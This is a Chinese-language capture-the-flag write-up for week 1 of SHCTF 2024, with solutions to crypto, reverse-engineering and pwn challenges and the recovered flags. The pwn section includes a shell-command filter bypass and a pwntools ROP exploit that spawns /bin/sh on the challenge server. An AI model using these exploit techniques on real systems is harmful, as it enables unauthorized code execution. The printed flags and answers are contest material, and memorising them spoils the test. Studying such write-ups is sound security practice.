[山河CTF 2024] week1

Crypto

说山河这个难度像newstar第2周,不过newstar第2周也不难

EzAES

AES_CBC有key,有iv

Hello Crypto

略,newstar第1周的题

baby_mod

关于模,RSA给出hint : leak = p*r-q*t-tmp,由于tmp很小只有16位可以爆破,模t后得到leak+tmp =p*r mod t,两边再除掉r(乘逆)就是p

tmp = 1<<12
while tmp<(1<<15):
    tmp = next_prime(tmp)
    p = (leak+tmp)%t * invert(r,t)%t
    if isPrime(p):
        print(p, long_to_bytes(pow(c,invert(65537,p-1),p)))
        #break

#(leak_tmp)%r = -qt%r = -q + t%r  
#SHCTF{992cd020-c077-4322-b725-42abb07351c8}

d_known

已知d求n,由于 e*d = 1 + k*phi当很小时k也会很小,可以爆破。如果e很大可以用更快的方法。

ed1 = e*d - 1
for k in range(1, e):
    if ed1%k == 0:
        #print(k)
        tphi = ed1//k 
        tp = iroot(tphi,2)[0]
        tp = next_prime(tp)
        tq = tphi//(tp-1)+1
        if tphi%(tp-1) == 0 and isPrime(tq):
            n = tp*tq 
            m = pow(c,d,tp*tq)
            print(long_to_bytes(m))

factor

先用yafu爆破出因子,再求这些因子的组合。

c = 18946548191938794864120361152574240388523945335296788837228348770322181581321602403615828138512043894011421076284003608755553490004627
N = 226135023770816618701618151846421847572902900031980838045326364286384135892650486405452233420434737106090920032098983593807060471503312296505342841682345021773470258125278766612640823497674061

'''
P20 = 17166246869917049249
P20 = 17777149920361894319
P20 = 18396972868824670501
P19 = 9295485268086191407
P20 = 12446738783004209609
P19 = 9382735014592024387
P20 = 11432032909142176543
P20 = 11809257221756593327
P20 = 15184368613455131963
P20 = 18100230049134917857
'''

ps = [17166246869917049249,17777149920361894319,18396972868824670501,9295485268086191407,12446738783004209609,9382735014592024387,11432032909142176543,11809257221756593327,15184368613455131963,18100230049134917857]

for i in range(1024):
    a = bin(i)[2:].zfill(10)
    if a.count('1') != 7: continue
    phi = 1 
    n = 1
    for k in range(10):
        if a[k] == '1':
            phi *= ps[k]-1 
            n *= ps[k]
    d = invert(65537,phi)
    m = pow(c,d,n)
    flag = long_to_bytes(m)
    if b'SHCTF' in flag:
         print(flag)

PWN

指令执行器

同newstar week asm那题shell里作个syscall

签个到吧

命令过滤绕过: /bin/c?t fla?>&0

No stack overflow1

溢出到后门

No stack overflow2

溢出先泄露libc再system(/bin/sh)

No stack overflow2 pro

有syscall先读入/bin/sh再execve

from pwn import *
context(arch='amd64', log_level='debug')
elf = ELF('./vuln5')
pop_rdi = 0x00000000004022bf # pop rdi ; ret
pop_rsi = 0x000000000040a32e # pop rsi ; ret
pop_rdx = 0x000000000049d06b # pop rdx ; pop rbx ; ret
pop_rax = 0x00000000004507f7 # pop rax ; ret
syscall = 0x44f409 
bss = 0x4e8d00

p = remote('entry.shc.tf', 43778)

p.sendlineafter(b"size: \n", str(0x80000100).encode())
p.sendafter(b"input: \n", b'A'*0x100+ flat(0, pop_rdi, 0, pop_rsi, bss, pop_rdx,8,0, pop_rax,0, syscall, pop_rdi,bss, pop_rsi,0, pop_rdx,0,0, pop_rax, 59, syscall))
sleep(0.5)
p.send(b'/bin/sh\0')

p.interactive()

REV

EzDBG

这题有点意思,先是作不出来,然后问了出题人,说是弄难了,然后更新了附件,就OK了。

题目给的是个dmp文件,这是内存dump出来的文件,有点像取证题,用010EDIT可以看到块和位置。有6个module里边存着名字没啥用,下边memory64List是块和偏移,通过这里可以从文件中切出块。这些块实际上是程序运行生成的,所以里边会存着程序信息。(一个程序会包含多个连续的块)

块22里找到显示的输入flag提示,前边块21是程序部分,拿去IDA反编译。得到加密方法是异或66

'''
#发现加密方法是flag^0x66,从dmp文件里搜加密后的密文 
>>> xor(b'SHCTF{',b'\x66')
b'5.%2 \x1d'
在 0x1715c9 找到密文 然后解密
'''
print(xor(msg[0x1715c9:0x1715c9+39],b'\x66'))
#b'SHCTF{e8a0fe1156f2afaafe6d788e9d0e1f66}'

ezapk

得到加密方法

    public static String Encode(String str, byte[] bArr) {
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < str.length(); i++) {
            sb.append((char) (((char) (((char) (str.charAt(i) ^ bArr[i % bArr.length])) + 6)) * 2));
        }
        return Base64.getEncoder().encodeToString(sb.toString().getBytes(StandardCharsets.UTF_8));
    }

解出一堆乱码,提交居然正确

key = [12,15,25,30,36]

a = "woLDgMOgw7hEwoJQw7zDtsKow7TDpMOMZMOow75QxIbDnsKmw6Z4UMK0w7rCklDCrMKqwqbDtMOOw6DDsg=="
a = b64decode(a).decode('utf-8')

bytes([(ord(a[i])//2-6)^key[i%5] for i in range(len(a))])

#7Ush87-akjxcy2Ju-dwia9;JSO-IQixnsm
#一堆乱码居然正确
#SHCTF{7Ush87-akjxcy2Ju-dwia9;JSO-IQixnsm}

ezrc4

RC4是拿流来异或明文,解密相同。得到已知明文对应的密文就能异或得到加密流,然后再异或密文就能拿到明文

ezxor

#sub_140014C50()
v9 = [-61,105,114,-60,103,74,-24,17,67,-49,111,0,-13,68,110,-8,89,73,-24,78,94,-30,83,67,-79,92]

x = [0x90,0x21,0x31]
bytes([((v9[i])^x[i%3])&0xff for i in range(26)])
bytes([((v9[i]&0xff)^x[i%3]) for i in range(26)])
#SHCTF{x0r_N1ce_hxxxoorrr!}

gamegame

是个数独,sagemath里有解数独函数

msg = open('r5_sudoku.exe','rb').read()[0x2600: 0x2600+4*81]
sd = [msg[i] for i in range(0, 4*81,4)]
sd = [5, 3, 0, 0, 7, 0, 0, 0, 0, 6, 0, 0, 1, 9, 5, 0, 0, 0, 0, 9, 8, 0, 0, 0, 0, 6, 0, 8, 0, 0, 0, 6, 0, 0, 0, 3, 4, 0, 0, 8, 0, 3, 0, 0, 1, 7, 0, 0, 0, 2, 0, 0, 0, 6, 0, 6, 0, 0, 0, 0, 2, 8, 0, 0, 0, 0, 4, 1, 9, 0, 0, 5, 0, 0, 0, 0, 8, 0, 0, 7, 9]

'''
[5 3 4 6 7 8 9 1 2]
[6 7 2 1 9 5 3 4 8]
[1 9 8 3 4 2 5 6 7]
[8 5 9 7 6 1 4 2 3]
[4 2 6 8 5 3 7 9 1]
[7 1 3 9 2 4 8 5 6]
[9 6 1 5 3 7 2 8 4]
[2 8 7 4 1 9 6 3 5]
[3 4 5 2 8 6 1 7 9]
'''
a = '534678912672195348198342567859761423426853791713924856961537284287419635345286179'
b = ''.join([a[i] for i in range(81) if sd[i]==0])
#shctf{468912723481342575971422657913948591537428763345261}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值